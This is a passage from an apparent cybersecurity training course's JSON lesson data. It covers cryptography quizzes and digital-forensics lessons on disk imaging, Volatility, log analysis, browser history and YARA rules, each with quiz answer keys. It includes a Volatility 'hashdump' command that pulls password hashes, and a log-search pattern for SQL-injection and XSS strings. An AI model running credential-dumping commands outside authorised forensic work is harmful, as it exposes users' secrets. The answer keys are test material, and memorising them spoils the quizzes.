protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"fo-acquisition-tools","cat":"Forensics & IR","title":"Forensic Acquisition Tools Comparison","diff":1,"xp":75,"intro":"Compare FTK Imager, dd, dc3dd, and Guymager.","sections":[{"type":"text","content":"Different tools for different situations: FTK Imager (GUI, Windows), dd (universal, command line), dc3dd (dd with hashing), Guymager (Linux GUI)."},{"type":"code","lang":"bash","content":"# dd (basic, universal)\ndd if=/dev/sda of=evidence.raw bs=4M\n# dc3dd (dd + automatic hashing)\ndc3dd if=/dev/sda of=evidence.raw hash=sha256 log=hash.log\n# FTK Imager (Windows GUI) - point and click\n# Guymager (Linux GUI) - forensic-focused"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"dc3dd improves on dd by...","opts":["Faster speed","Automatic hash calculation during imaging","Better compression","Smaller output"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-volatility-plugins","cat":"Forensics & IR","title":"Volatility Plugin Guide","diff":2,"xp":150,"intro":"Key Volatility plugins for memory forensic analysis.","sections":[{"type":"text","content":"Essential plugins: pslist/psscan (processes), netscan (connections), malfind (injected code), dlllist (loaded DLLs), handles, cmdline, hashdump."},{"type":"code","lang":"bash","content":"vol.py -f mem.dmp --profile=Win10x64 pslist\nvol.py -f mem.dmp --profile=Win10x64 netscan\nvol.py -f mem.dmp --profile=Win10x64 malfind\nvol.py -f mem.dmp --profile=Win10x64 hashdump\nvol.py -f mem.dmp --profile=Win10x64 cmdscan"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"malfind detects...","opts":["File changes","Code injected into process memory","Network connections","Registry changes"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-log-analysis","cat":"Forensics & IR","title":"Log Analysis Techniques","diff":1,"xp":100,"intro":"Extract actionable intel from system and application logs.","sections":[{"type":"text","content":"Key logs: auth.log (SSH), apache access/error, Windows Security/System, syslog. Look for: failed logins, unusual times, privilege escalation, new accounts."},{"type":"code","lang":"bash","content":"# Failed SSH logins\ngrep 'Failed password' /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -rn\n# Successful logins at unusual hours\ngrep 'Accepted' /var/log/auth.log | awk '{print $1,$2,$3,$9,$11}'\n# Apache suspicious requests\ngrep -iE '.../|union.*select|<script' /var/log/apache2/access.log"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Looking for unusual login times helps detect...","opts":["Performance issues","Compromised accounts being used outside business hours","DNS problems","Disk failures"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-evidence-handling","cat":"Forensics & IR","title":"Digital Evidence Handling","diff":1,"xp":50,"intro":"Maintain evidence integrity from collection to court.","sections":[{"type":"text","content":"Hash everything immediately. Use write-blockers. Document every action. Maintain chain of custody. Work on copies, never originals."},{"type":"code","lang":"bash","content":"# Immediately hash the source\nsha256sum /dev/sda > source_hash.txt\n# Image with write-blocker attached\ndc3dd if=/dev/sda of=evidence.raw hash=sha256\n# Verify\nsha256sum evidence.raw\n# All analysis on the copy, never the original"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Write-blockers prevent...","opts":["Reading the disk","Accidentally modifying the evidence during imaging","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-browser-forensics","cat":"Forensics & IR","title":"Browser Forensic Analysis","diff":2,"xp":150,"intro":"Extract browsing history, downloads, and cached credentials.","sections":[{"type":"text","content":"Browser databases store: history, downloads, cookies, form data, saved passwords (DPAPI encrypted on Windows), bookmarks, and extensions."},{"type":"code","lang":"bash","content":"# Chrome history (SQLite)\nsqlite3 'History' 'SELECT url,title,datetime(last_visit_time/1000000-11644473600,\"unixepoch\") FROM urls ORDER BY last_visit_time DESC LIMIT 20'\n# Firefox\nsqlite3 places.sqlite 'SELECT url,title FROM moz_places ORDER BY last_visit_date DESC LIMIT 20'"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Browser history is stored in...","opts":["Text files","SQLite databases","Registry","Encrypted blobs only"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-timeline","cat":"Forensics & IR","title":"Super Timeline Creation","diff":3,"xp":200,"intro":"Combine all artifact timestamps into one unified timeline.","sections":[{"type":"text","content":"Plaso/log2timeline extracts timestamps from: files, registry, event logs, prefetch, browser, and more. One timeline shows everything that happened."},{"type":"code","lang":"bash","content":"log2timeline.py timeline.plaso evidence.dd\npsort.py -o l2tcsv timeline.plaso -w timeline.csv\n# Filter by date\npsort.py -o l2tcsv timeline.plaso 'date > \"2024-01-15\"' -w filtered.csv"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"A super timeline combines...","opts":["Only file timestamps","Timestamps from ALL artifact sources into one view","Only event logs","Only registry"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-yara-advanced","cat":"Forensics & IR","title":"Advanced YARA Rules","diff":3,"xp":200,"intro":"Write complex YARA rules with conditions and modules.","sections":[{"type":"text","content":"Beyond basic strings: use PE module (imports, sections), math module (entropy), file size conditions, and regular expressions for flexible matching."},{"type":"code","lang":"yaml","content":"import 'pe'\nimport 'math'\nrule SuspiciousPacked {\n  condition:\n    pe.number_of_sections > 5 and\n    math.entropy(0, filesize) > 7.0 and\n    pe.imports('kernel32.dll', 'VirtualAlloc') and\n    filesize < 500KB\n}"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"High entropy in a binary suggests...","opts":["Normal code","The binary is packed or encrypted","Debug symbols","Documentation"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"df-ids-tuning","cat":"Defense & Blue Team","title":"IDS/IPS Rule Tuning","diff":2,"xp":150,"intro":"Reduce false positives without missing real attacks.","sections":[{"type":"text","content":"Tune 